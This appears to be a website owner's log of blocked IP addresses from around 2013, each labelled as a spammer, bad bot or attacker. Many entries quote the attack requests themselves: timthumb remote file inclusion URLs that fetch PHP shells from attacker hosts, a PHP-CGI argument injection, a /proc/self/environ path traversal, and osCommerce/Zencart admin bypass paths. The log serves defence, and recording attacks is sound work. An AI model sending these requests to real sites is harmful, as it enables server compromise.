70.174.185.71 Hostname: ip70-174-185-71.dc.dc.cox.net
Company: United States – Alexandria Cox Communications
Regularly seen lookup for stylesheets and Star rating files without loading any pages.
May be trying to use site as CDN
67.214.185.154 Company: United States – Santa Monica Colostore.com Trying WordPress timthumb RFI exploit
wp-content/themes/TheStyle/timthumb.php?src=http %3A%2F%2Fpicasa.com.lawebshop.ca%2Fjahat.php
77.222.40.65 Hostname: vh22.sweb.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
37.59.82.65 Company: France – Roubaix Ovh Systems Trying to login/register
110.85.113.69 Host: China – Fuzhou Chinanet Fujian Province Network Brute force login/register attempt
/profile.php?mode=register&agreed=true&coppa=0
/index.php?act=Login&CODE=00
/ucp.php?mode=register
/registration_rules.asp?FID=0
/index.php?do=/user/register/
/index.php?page=en_Signup
/tools/quicklogin.one
/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/index.php?app=core&module=global&section=login
/index.php?p=member/signup
/YaBB.cgi/
YaBB.pl/
/index.php/forums/member/register
/member/join.php
/join_form.php
203.197.151.138 Hostname: gw1.corpgw.com
Company: India – Ernakulam Internet Service Provider
Direct request for info.php file
No referrer
95.108.150.235 Hostname: sticker00.yandex.ru
Host: Russian Federation – Moscow Yandex Llc
Banned Bot: YANDEX
Banned Region: RUSSIA
199.187.122.210 Company: United States Philadelphia Anton Sulistiyono
(Shared hosting server)
Attempted WordPress timthumb remote file inclusion exploit
/wp-content/themes/Quadro/scripts/timthumb.php?src=http: //flickr.com.farshidweb.com/upload.php
Blocked by firewall – banned
41.250.82.43 Company: Morocco – Casablanca Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Attempt to upload file
/wp-admin%2Fmedia-upload.php%3Fpost_id%3D182%26type%3Dimage%26TB_iframe
%3D1%26width%3D640%26height%3D690&reauth=1
Known Mail server and Dictionary Attacker
94.124.93.172 Hostname: keurigonline32.nl
Company: Netherlands – Groningen Cj2 Hosting&development
Attempted WordPress timthumb remote file inclusion exploit
/wp-content/plugins/really-easy-slider/inc/thumb.php?src=http: //blogger.com.izlicez.biz/byroe.php
67.225.235.134 Hostname: server.muzhda.com
Company: United States – Tampa Liquid Web Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.54.107.68 Hostname: static-173-54-107-68.nwrknj.fios.verizon.net
Company: United States – Ashburn Verizon Online Llc
User agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.188.147 Company: Sweden – Stockholm Deepak Mehta Fie Bot Trying to register/login
8.30.145.190 Company: United States – Omaha Level 3 Communications Inc. Bot Trying to register/login
184.171.160.91 Company: United States – Phoenix Secured Servers Llc Comment Spammer
192.74.229.1 Company: China – Chengdu Anxin Comment and Forum Spammer
75.69.194.57 Hostname: c-75-69-194-57.hsd1.ct.comcast.net
Company: United States – Farmington Comcast Cable Communications Holdings Inc
DoS attack from this IP using Comcast Java traffic hijacker script.
/e8f6b078-0f35-11de-85c5-efc5ef23aa1f/aupm/notify.do?dispatch=checkBulletin
Attack started 01/24/2013 – 03:33 (GMT) and continued to 01/24/2013 – 05:13 (GMT)
No other traffic was able to access site during this time
This and all Comcast IP’s will be denied access
Read More: Comcast caught hijacking web traffic
185.3.134.71 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register/login
63.246.155.48 Hostname: hal9000.enviroweb.com.ar
Company: United States – Miami United Colocation Group Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.250.114.248 Company: United States – Chicago Servergurus Llc Mail Server
Malicious User Agent: Java/1.4.1_04
103.5.49.37 Company: Indonesia – Jakarta Pt. Indie Internet Solution Comment Spammer, Mail Server, Dictionary Atacker
37.72.190.153 Company: United States – Carolina Deepak Mehta Fie Comment Spammer
161.53.174.9 Hostname: www. sczg.hr
Company: Croatia – Zagreb Croatian Academic And Research Network
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.74.228.161 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
37.59.91.60 see next Company: France – Roubaix Ovh Systems Comment Spammer
37.113.62.81 Hostname: 37x113x62x81.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
37.221.168.235 Company: Germany – Frankfurt Am Main Voxility S.r.l. Trying to login/register
199.87.249.91 Hostname: h-249-91.scoutjet.com
Company: United States Redwood City Blekko Inc.
Banned User Agent:
Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http: //blekko.com/about/blekkobot)
87.29.92.147 Hostname: host147-92-static.29-87-b.business.telecomitalia.it
Company: Italy Roma Telecom Italia Net
Remote file inclusion attempt
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp: //www.hoteltill.it/test.php
65.254.43.207 Hostname: gnax-vc47.simplehelix.com
Company: United States – Atlanta Global Net Access Llc
Remote file inclusion attempt
/wp-content/plugins/advanced-custom-fields/core/actions/export.php
/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=
http: //www.goguan.net/wb_data/dor.txt???
72.233.72.155 Hostname: 155.72.233.72.static.reverse.ltdomains.com
Company: United States Kansas City Layered Technologies Inc.
Comment Spammer, Mail Server, Rule Breaker bot
216.164.170.6 Hostname: 216-164-170-6.c3-0.atw-ubr5.atw.pa.cable.rcn.com
Company: United States – Allentown Rcn Corporation
Contact form spammer
173.54.107.68 Hostname: static-173-54-107-68.nwrknj.fios.verizon.net
Company: United States Ashburn Verizon Online Llc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php
/wponlinestore-review/2/%2B%22by+oscommerce%22++%22/shop/
admin/banner_manager.php/login.php
193.14.16.27 Hostname: c193-14-16-27.cust.tele2.se
Company: Sweden – Kista Lan Tjansten
Spammer – Found Honeypot Trap
81.44.243.134 Hostname: 134.Red-81-44-243.dynamicIP.rima-tde.net
Company: Spain – Madrid Telefonica De Espana Sau
Comment Spammer
133.242.195.179 Hostname: sb179.rwrwrw.com
Company: Japan – Sakura Rich&wise Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
admin/record_company.php/password_forgotten.php
85.131.50.136 Hostname: ws136.fabsy.fi
Company: Finland – Rauma Forlags Ab Sydvastkusten
Hacker: Attempted wpOnlineStore/osCommerce/Zencart exploit and MySQL hack
/admin/sqlpatch.php/password_forgotten.php?action=execute
/admin/record_company.php/password_forgotten.php
/extras/curltest.php
211.62.35.145 Company: Korea, Republic Of – Seoul Kthitel Co. Ltd. Remote file inclusion attempt
/menu.php?root_path=http: //recycleengineering.com/itrecycle/tmp/install
_4e8971c78d252/arm7/html/com_tools/daster.jpg??
88.254.78.234 Hostname: 88.254.78.234.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Tried to access site admin
76.72.173.236 Company: United States – Philadelphia Database By Design Llc Bad request:
/’ encodeURIComponent(location.href) ‘&title=’ encodeURIComponent(document.title),
‘delicious’,’toolbar=no,width=550,height=550′); return false;
46.105.168.172 Company: France – Roubaix Ovh Systems Comment Spammer
IP is possibly used by CAPTCHA breaker.
Repeated lookup for /image_captcha/******/******
Faked referrer
111.172.129.150 Company: China – Wuhan Chinanet Hubei Province Network Brute force login/register attempt
74.221.217.198 Company: United States – Seattle Dme Hosting Llc WordPress Trackback Spammer
Malicious User Agent: PHP/5.2.10
37.1.207.22 Company: United Kingdom – London 3nt Solutions Llp Timthumb RFI script attack:
/wp-content/themes/rt_panacea_wp/thumb.php
/wp-content/themes/Memoir/thumb.php
/wp-content/themes/flashnews/thumb.php
161.53.174.10 Hostname: mail.sczg.hr
Company: Croatia – Zagreb Croatian Academic And Research Network
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
24.173.94.226 see next Company: United States – Plano Road Runner Holdco Llc Trying to login/register.
Seen without User Agent
Known user agents:
Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Banned
24.173.0.0/16 Company: United States – Plano Road Runner Holdco Llc Suspected of being used by EZOOMSBOT and YANDEX
178.33.251.11 Hostname: linux .yabancidizihd.net
Company: France – Roubaix Ovh Systems
Timthumb RFI script attack:
/wp-content/themes/e-line-Edit/scripts/timthumb.php?src=http
%3A%2F%2Fblogger.com.waterpointto.com%2Fcilik.php
198.74.126.229 Hostname: 229-126-74-198-dedicated.multacom.com
Company: United States – Canyon Country Multacom Corporation
Javascript injection attempted:
190.97.204.37 Hostname: 190-97-204-37.ert.com.co
Company: Colombia – Cali Empresa De Recursos Tecnologicos S.a E.s.p
Comment Spammer – bot – found honeypot trap
142.4.98.210 Company: China – Chengdu Anxin Comment Spammer – bot – found honeypot trap
50.117.61.242 Company: United States – San Jose Detectnetwork.us Comment Spammer
195.50.30.207 Company: Belarus – Minsk Unibel Attempted Joomla exploit
//administrator/components/com_jce/jce.xml
96.44.189.102 Hostname: herngaard .torservers.net
Company: United States – Dallas Quadranet Inc
Spammer – Found Honeypot Trap
61.49.40.28 Company: China – Beijing China Unicom Beijing Province Network Spammer – Found Honeypot Trap
197.248.2.172 Hostname: 174.127.82.232.static.midphase.com
Company: Kenya – Nairobi One Communications Ltd
Timthumb script attack:
wp-content/themes/wp-newspaper/timthumb.php?src=http
%3A%2F%2Fphotobucket.com.eltrabajo.cl/bajo.php
Blocked by server security script
88.254.78.234 Hostname: 88.254.78.234.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force attempt to access site admin
212.38.176.155 Company: United States – Zanesville Iomart Group Plc Multiple attempts to register/login
/register
/signup.php
/register
86.122.29.154 Hostname: 86-122-29-154.bacau.rdsnet.ro
Company: Romania – Bacau Rcs & Rds Business
Timthumb script attack:
//wp-content/themes/Minimal/timthumb.php?src=http:
//picasa.com.restoremasters.com/.test/crimecyber.php
37.1.207.22 Company: United Kingdom – London 3nt Solutions Llp Timthumb script attack:
wp-content/themes/DeepFocus/thumb.php
67.218.43.151 Hostname: server11.onecci.com
Company: United States – Scottsdale Oneneck It Services Corporation
Brute force Timthumb script attack:
//wp-content/themes/TheStyle/timthumb.php?src=http: //picasa.com.
restoremasters.com/.test/crimecyber.php
Blocked by server security script – banned
174.127.82.232 Hostname: 174.127.82.232.static.midphase.com
Company: United States – Marietta Hosting Services Inc.
Accessing disallowed folders for images
174.142.220.103 Hostname: server1.ddf.net.br
Company: Canada – Montreal Abcreg.net Limited
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
31.47.243.34 Hostname: 34.243.47.31.rdns.configcenter.info
Company: Germany – Ahrensburg Media:webline Internet Solutions Gmbh
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
72.55.179.80 Hostname: cp.dnsbytes.com
Company: Canada – Montreal Iweb Dedicated Cl
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
37.113.46.69 Hostname: 37x113x46x69.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment/Forum Spammer
50.31.10.161 Hostname: ip161.50-31-10.static.steadfastdns.net
Company: United States – Chicago Steadfast Networks
Comment Spammer
31.223.125.209 Company: Turkey – Istanbul Turknet Iletisim Hizmetleri A.s Trying to access site admin
142.54.171.242 Company: United States Kansas City 5280 Enterprises Llc. Comment Spammer
174.136.81.102 Hostname: Hypv2659.appliedi.net
Company: United States Lubbock Applied Innovations Corporation
Comment Spammer
122.155.12.113 Company: Thailand – Bangkok Cat Telecom Data Comm. Dept Idc Office Timthumb script attack
/wp-content/themes/MyProduct/timthumb.php../../../../../../../../../../../../..//proc/self
/environ%0000/&sa=U&ei=zo_3UKeNIOrhigK7uYGIDw&ved=0CLABEBYwNQ&usg=
AFQjCNFjAhJX7u6znmucIbLA6jeJb0SQmw/wp-content/theme
218.28.59.149 Hostname: pc0.zz.ha.cn
Company: China – Zhengzhou Education Bureaux
Spammer – Found Honeypot Trap
124.89.36.178 Company: China – Beijing Weinancity Ipaddresspool Spammer – Found Honeypot Trap
122.192.166.70 Company: China – Nanjing China Unicom Jiangsu Province Network Spammer – Found Honeypot Trap
83.69.16.167 Company: Russian Federation – Moscow Closed Joint Stock Company Severtranstelecom Spammer – Found Honeypot Trap
24.93.181.216 Hostname: cpe-24-93-181-216.neo.res.rr.com
Company: United States – Cleveland Road Runner Holdco Llc
Comment Spammer
64.191.117.66 Company: United States – Las Vegas Pvnt Networks Comment Spammer
1.242.111.64 Company: Korea, Republic Of – Seoul Sk Broadband Co Ltd Comment Spammer
100.43.83.135 Hostname: spider-100-43-83-135.yandex.com
Company: United States – Palo Alto Yandex Inc
User Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Yandex Bot
180.76.5.175 Hostname: baiduspider-180-76-5-175.crawl.baidu.com
Company: China Beijing Beijing Baidu Netcom Science And Technology Co. Ltd.
Baidu Bot
Does not always identify itself as a bot e.g. UA – Mozilla/5.0 (Windows NT 5.1; rv:6.0.2)
Gecko/20100101 Firefox/6.0.2
Baidu bots are banned
5.9.112.68 Hostname: 5-9-112-68.crawler.sistrix.net
Company: Germany Nuremberg Hetzner Online Ag
User Agent:
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Unwanted Bot / Bad Bot
46.4.94.200 Hostname: s3.jupe.pl
Company: Germany – Nuremberg Hetzner Online Ag
Fake User Agent: Googlebot/2.1 (+http: //www.googlebot.com/bot.html)
This is a Germany – Nuremberg Hetzner Online Ag IP, Not Google
Banned
216.136.28.6 Hostname: bx2.urdirect.net
Hostname: pcanywhere.twc-moldin.urdirect.net
Company: United States – San Antonio Tw Telecom Holdings Inc.
Attempted WordPress GD Star Ratings plugin / Timthumb exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security script – BANNED
91.223.16.196 Hostname: vvps-816847.dailyvps.co.uk
Company: United Kingdom – Derby Daily Internet Ltd
Comment Spammer
66.36.189.37 Hostname: weberize-egypt.com
Company: United States – Elk Grove Siteturn Networks Inc.
Comment Spammer
83.27.101.91 Hostname: axp91.neoplus.adsl.tpnet.pl
Company: Poland – Wroclaw Neostrada Plus
Comment Spammer
192.119.144.57 Company: United States – Dallas Kristina Chung Comment Spammer
62.73.112.167 Hostname: client.playtime.bg
Company: Bulgaria – Blagoevgrad Bulgarian Telecommunications Company Plc.
Comment Spammer
83.21.208.196 Hostname: elo196.neoplus.adsl.tpnet.pl
Company: Poland – Szczecin Neostrada Plus
Comment Spammer
213.221.55.78 Company: Russian Federation – Moscow Sovintel Dymov Comment Spammer
42.96.145.89 Company: China – Beijing Alibaba (beijing) Technology Co. Ltd. Comment Spammer
23.19.72.144 Company: United States – Phoenix Nobis Technology Group Phoenix Comment Spammer
81.64.221.64 Hostname: 81-64-221-64.rev.numericable.fr
Company: France Paris Nc Numericable S.a.
DDoS attack blocked by Firewall
174.127.82.214 Hostname:174.127.82.214.static.midphase.com
Company: United States -Marietta Hosting Services Inc.
DDoS attack blocked by Firewall
141.223.5.21 Hostname: home1.postech.ac.kr
Company: Korea, Republic Of – Seoul Pohang University Of Science And Technology
Brute force attempt to post using WordPress xmlrpc
10 attempts per second
50.115.171.36 Company: United States – Los Angeles Virpus Networks Comment Spammer
41.203.208.5 Hostname: cpanel01.safaricombusiness.co.ke
Company: Kenya – Nairobi This Is For Fixed Wimax For Corporate Customers
Attempted WordPress GD Star Ratings plugin / Timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http: //picasa.com.tvd-online.org/stunxx.php
174.142.90.175 Company: Canada – Montreal Iweb Dedicated Cl Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security scripts – Banned
212.100.249.92 Hostname: 314227-web1.accountz.com
Company: United States – San Antonio Rackspace.com
Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security scripts – Banned
195.62.25.214 Company: Ukraine – Kharkiv Megacom Comment Spammer:
Found Honeypot Trap
203.162.0.78 Hostname: m78.vnn.vn
Company: Viet Nam – Ha Noi Vietnam Data Communication Company
Attempted timthumb exploit
/wp-content/themes/TheStyle/timthumb.php?src=http
%3A%2F%2Fimg.youtube.com.cicadex.com%2Fbad.php
IP known to be used for DDoS attacks
142.4.208.171 Hostname: ks4003092.ip-142-4-208.net
Company: Canada – Montreal Ovh Hosting Inc.
DoS attacker.
/index.php?option=com_user&view=reset&layout=confirm
IP blocked by firewall after single event
No User Agent, No Referrer
93.182.137.30 Hostname: anon-137-30.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Javascript Injection attack via WordPress Comment system
Blocked by firewall
64.91.232.42 Company: United States – Portland Liquid Web Inc. Unwanted / Bad Bot
PopScreenBot
Content scraper for videos – plagiarist/embedder
81.145.59.123 Company: United Kingdom – Newport Central Trust Plc Comment Spammer
83.21.206.206 Hostname: elm206.neoplus.adsl.tpnet.pl
Company: Poland – Szczecin Neostrada Plus
Mail Server and Comment Spammer
213.136.36.251 Hostname: h-213-136-36-251.na.cust.bahnhof.se
Company: Sweden – Stockholm Bahnhof Internet Ab
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?action=new_product_preview&cPath
156.25.4.2 Company: Switzerland – Fribourg Administration Cantonale De Fribourg Looking for non-existent URLS
/notified-SplashPage_FR?aHR0cDovL3Nob3AuZ3JhcGhpY2xpbmUuY28uemEvcHJvZHVjdC9taWNy
b3NvZnQtdmlzaW8tMjAxMC1wcm9mZXNzaW9uYWwv
/verify-SplashPage_FR?aHR0cDovL3Nob3AuZ3JhcGhpY2xpbmUuY28uemEvcHJvZHVjdC9taWNy
b3NvZnQtdmlzaW8tMjAxMC1wcm9mZXNzaW9uYWwv
151.237.188.140 Company: Sweden – Stockholm Deepak Mehta Fie WordPress Trackback Spammer
217.171.58.106 Hostname: 106.217-171-58.tkchopin.pl
Company: Poland – Wejherowo Telewizja Kablowa Chopin Bogdan Laga Dariusz Schmidtke Spolka Jawna
Comment Spammer
66.49.199.112 Hostname: host17.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.maxg.ro/indek.php
66.49.223.233 Hostname: host168.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.playteck.net/indeks.php
64.59.72.155 Company: United States – New York City Mojohost Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.playteck.net/indek.php
50.63.154.219 Hostname: ip-50-63-154-219.ip.secureserver.net
Company: United States Scottsdale Godaddy.com Llc
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.maxg.ro/indek.php
108.62.215.114 Hostname: 108.62.215.114.rdns.ubiquityservers.com
United States – Dallas Nobis Technology Group Llc
Trying to login/register on restricted site
/?q=user/register
Comment Spammer
Bad Host: Dallas Nobis Technology Group
142.91.79.13 Hostname: 142.91.79.13.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
31.192.215.181 Hostname: 181ntd2wa.ni.net.tr
Company: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Timthumb remote file inclusion attempt:
/wp-content/plugins/extend-wordpress/helpers/thumb.php
METHOD: GET
/&amp;sa=U&amp;ei=oCP1UNKdKMa2hAeB7oH4DA&amp;ved=0CBQQFjAAOLwF&amp;usg=AFQjCNECnXssk5sPOFXDUkaH561DPF2foQ/wp-content/plugins/extend-
wordpress/helpers/thumb.php
87.101.137.99 see next Company: Saudi Arabia – Riyadh Integrated Telecom Co. Ltd Trying to login/register on restricted site
/?q=user/register
Known Mail Server, Dictionary Attacker and Comment Spammer
141.255.164.73 Company: Switzerland – Bern Red Transit Llc Comment Spammer
141.255.167.103 Company: Switzerland – Bern Red Transit Llc Comment Spammer
173.234.250.79 Hostname: 173-234-250-79.ipvnow.com
Company: United States – West Hollywood Squid Media Llc
Comment Spammer
67.202.91.116 Company: United States – Chicago Steadfast Networks Trying to login/register on restricted site
/?q=user/register
64.87.61.102 Hostname: 64.87.61.102.rdns.ubiquityservers.com
Company: United States – Grand Prairie Colocateusa
Trying to login/register on restricted site
/?q=user/register
197.220.97.2 Company: Kenya – Mombasa Simbanet Com (k) Ltd Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/file_manager.php/login.php?src=http
%3A%2F%2Fblogger.com.thejumperguys.com%2Fbad.php
184.22.50.184 Hostname: 184-22-50-184.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Trying to login/register on restricted site
/?q=user/register
216.151.130.36 Company: United States – Santa Monica Xeex Comment Spammer
121.54.32.156 Company: Philippines – Makati Smart Broadband Incorporated Mail Server / Dictionary Attacker / Comment Spammer
Found honeypot trap
190.186.229.58 Hostname: dynamic-ip-cablemodem-190.186.229.58.cotas.com.bo
Company: Bolivia – Plurinational State Of Santa Cruz De La Sierra Cotas Ltda.
Comment Spammer
184.82.110.2 Hostname: 184-82-110-2.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Trying to login/register on restricted site
/?q=user/register
147.255.162.108 Hostname: 147.255.162.108.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Trying to login/register on restricted site
/?q=user/register
194.71.225.104 Company: Sweden – Stockholm Iehavoc Ab Comment Spammer
46.227.71.192 Hostname: 46-227-71-192.static.obenetwork.net
Company: Sweden – Sundbyberg Obenetwork Ab
Comment Spammer
128.73.237.105 Hostname: 128-73-237-105.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Comment Spammer
74.208.162.242 Hostname: sys101.emailling.net
Company: United State – Wayne 1&1 Internet Inc.
Comment Spammer
75.101.181.182 Hostname:ec2-75-101-181-182.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Malicious User Agent:
Java/1.6.0_27
59.39.218.185 Company: China – Guangzhou Chinanet Guangdong Province Network Attempting to post content/comment with direct lookup.
/submit.php
No other pages got, no referrer
54.232.31.196 Hostname: ec2-54-232-31-196.sa-east-1.compute.amazonaws.com
Company: Brazil – Sao Paulo Amazon.com Inc.
Comment Spammer
125.216.144.199 Company: China – Beijing Guangzhou Auto College South China University Of Technology Comment Spammer
64.237.37.8 Hostname: 64-237-37-8.reliableservers.com
Company: United States – Newark Choopa Llc
Trying to login/register on restricted site
/?q=user/register
62.28.148.20 Company: Portugal – Lisbon Pt Prime – Solucoes Empresariais Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.0.52.159 Hostname: penguin.reachstuff.com
Company: United States – Kansas City Dnsslave.com
Comment Spammer
Posted links to http: //www dot semanarionatural.com/pastillas-para-adelgazar-naturales/
204.236.166.218 Hostname: ec2-204-236-166-218.us-west-1.compute.amazonaws.com
Company: United States – San Francisco Amazon.com Inc.
Banned User Agent:
JS-Kit URL Resolver, http: //js-kit.com/
217.118.79.29 Company: Russian Federation – Novosibirsk Ojsc Vimpelcom Rogue bot: Mozilla/5.0 (compatible; 008/0.85; http //www.80legs.com/webcrawler.html)
Gecko/2008032620
173.212.198.43 Hostname: 173-212-199-43.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
UA: Mozilla/5.0 (compatible; OnetSzukaj/5.0; http: //szukaj.onet.pl)
Comment Spammer – direct request for /wp-comments-post.php
142.0.34.145 Company: United States – Scranton Volumedrive Trying to login/register on restricted site
/?q=user/register
222.177.230.67 Company: China – Chongqing Chinanet Chongqing Province Network Trying to login/register on restricted site
/?q=user/register
218.204.131.250 Company: China – Beijing China Mobile Communications Corporation – Jiangxi Comment Spammer
Found Honeypot Trap
124.193.202.18t Company: China – Beijing Beijing Zhongbangyatong Telecom Technology Co Ltd Comment Spammer
Found Honeypot Trap
166.90.142.9 Hostname: nat.kosmix. com
Company: United States – Mountain View Cosmix Corporation
dDOS attack blocked by Firewall
23.19.171.228 Hostname: 23.19.171.228.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Comment Spammer
74.221.212.36 Company: United States – Seattle Dme Hosting Llc Comment Spammer
108.178.130.197 Hostname: rrcs-108-178-130-197.west.biz.rr. com
Company: United States – Clarksburg Road Runner Holdco Llc
Comment Spammer
216.187.95.254 Hostname: peer1-carp-ext.gfed. net
Company: Canada – Richmond 3336 Investments Ltd.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
85.234.39.219 Hostname: m5-ural.ru
Company: Russian Federation – Moscow Cjsc Comstar-regions
Comment Spammer.
Looking for index.php files in folders
74.125.184.16 Company: United States – Mountain View Google Inc. Comment Spammer
194.71.224.34 Company: Sweden – Stockholm Iehavoc Ab Trying to register on restricted site
/?q=user/register
/user/register
8.18.120.121 Company: United States – Omaha Level 3 Communications Inc. Trying to register on restricted site
/?q=user/register
/user/register
142.0.44.147 Company: United States – Scranton Volumedrive Javascript injection attack blocked by firewall
85.214.107.235 Hostname: h1648427.stratoserver.net
Company: Germany – Berlin Strato Ag
Timthumb remote file inclusion attack
/wp-content/themes/sportpress/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.thedoginnludham.co.uk%2Fsimple.php
61.221.117.244 Hostname: 61-221-117-244.HINET-IP.hinet.net
Company: Taiwan – Taipei Data Communication Business Group Chunghwa Telecom Co. Ltd.
Mail Server.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
84.253.190.188 Hostname: net84-253-190-188.mclink.it
Company: Italy – Roma Mc-link Spa
Longest User Agent I’ve seen: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12″,”Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4″,”Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0″,”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
217.218.62.246 Company: Iran, Islamic Republic Of – Tehran Iran Telecommunication Research Center Itr
User Agent ID: parsijoo
Rule Breaker
Bad Bot
184.107.230.34 Hostname: ns3.cheatsbrasil. org
Company: Canada – Montreal Alessandre De Moura Cavalcante
Remote file inclusion attempt:
/fancygalleryhttp: //flickr.com.soluteq.com/bot.txt??
{URL}&amp;sa=U&amp;ei=e2nqUKLbDq2L4gTM1YGgBg&amp;ved=
0CH4QFjAp&amp;usg=AFQjCNHLDaQJJBOT8m3PlD9vxE6-fN0QXA/fancygallerytest??
/fancygallerytest??
8.18.120.128 Company: United States – Omaha Level 3 Communications Inc. Trying to register on restricted site
/?q=user/register
/user/register
80.243.190.251 Hostname: 251-190-243-80.rackcentre.redstation.net.uk
Company: United Kingdom – Gosport Redstation Limited
Trying to register on restricted site
/?q=user/register
/user/register
173.234.196.142 Company: United States – Chicago Ubiquity Server Solutions Chicago Trying to register on restricted site
/?q=user/register
/user/register
64.34.204.236 Company: United States – Los Angeles H4y Technologies Llc Trying to register on restricted site
/?q=user/register
/user/register
218.28.140.186 Company: China – Zhengzhou Sanhkjsy Corp Trying to login to WordPress on restricted site
173.212.212.10 Hostname: 173-212-212-10.static.hostnoc. net
Company: United States – Scranton Network Operations Center Inc.
Comment Spammer – direct POST event to /wp-comments-post.php
No referrer
UA: Mozilla/4.76 [en] (X11; U; SunOS 5.7 sun4u)
76.74.220.247 Company: United States – Los Angeles H4y Technologies Llc Trying to register on restricted site
/?q=user/register
/user/register
61.181.22.157 Company: China – Tianjin China Unicom Tianjin Province Network Comment Spammer / Rule Breaker
Found honeypot trap
219.92.235.93 Hostname: aar-235-93.tm.net.my
Company: Malaysia – Kuala Lumpur Tmnet
Comment Spammer – Mail Server
